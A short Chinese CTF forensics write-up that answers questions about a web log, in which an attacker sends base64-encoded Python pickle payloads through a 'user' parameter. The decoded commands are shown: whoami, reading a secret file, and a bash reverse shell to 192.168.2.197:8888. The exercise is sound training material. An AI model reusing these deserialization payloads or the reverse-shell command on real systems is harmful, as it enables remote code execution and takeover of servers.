題目描述
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnd2hvYW1pJwpwMQowKGcwCmxwMgowKEkwCnRwMwowKGczCkkwCmRwNAowY29zCnN5c3RlbQpwNQowZzUKKGcxCnRSLg== HTTP/1.1" 500 -(base64解碼user值后 =為whomai)
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnY2F0IC9UaDRzX0lTX1ZFUllfSW1wb3J0X0ZpMWUnCnAxCjAoZzAKbHAyCjAoSTAKdHAzCjAoZzMKSTAKZHA0CjBjb3MKc3lzdGVtCnA1CjBnNQooZzEKdFIu HTTP/1.1" 500 -(cat /Th4s_IS_VERY_Import_Fi1e)
127.0.0.1 - - [07/Aug/2021 10:43:12] "GET /?user=STAKcDAKMFMnYmFzaCAtaSA%2bJiAvZGV2L3RjcC8xOTIuMTY4LjIuMTk3Lzg4ODggMD4mMScKcDEKMChnMApscDIKMChJMAp0cDMKMChnMwpJMApkcDQKMGNvcwpzeXN0ZW0KcDUKMGc1CihnMQp0Ui4= HTTP/1.1" 500 -(bash -i >& /dev/tcp/192.168.2.197/8888 0>&1)
flag:
user,這里我以為是命令的參數,其實是url的參數
7.2 黑客查看的秘密文件的絕對路徑是_____________。
wp:
請看上題
flag:
Th4s_IS_VERY_Import_Fi1e
7.3 黑客反彈shell的ip和端口是_____________。(格式使用“ip:端口",例如127.0.0.1:2333)
wp:
請看上題
flag:
192.168.2.197#8888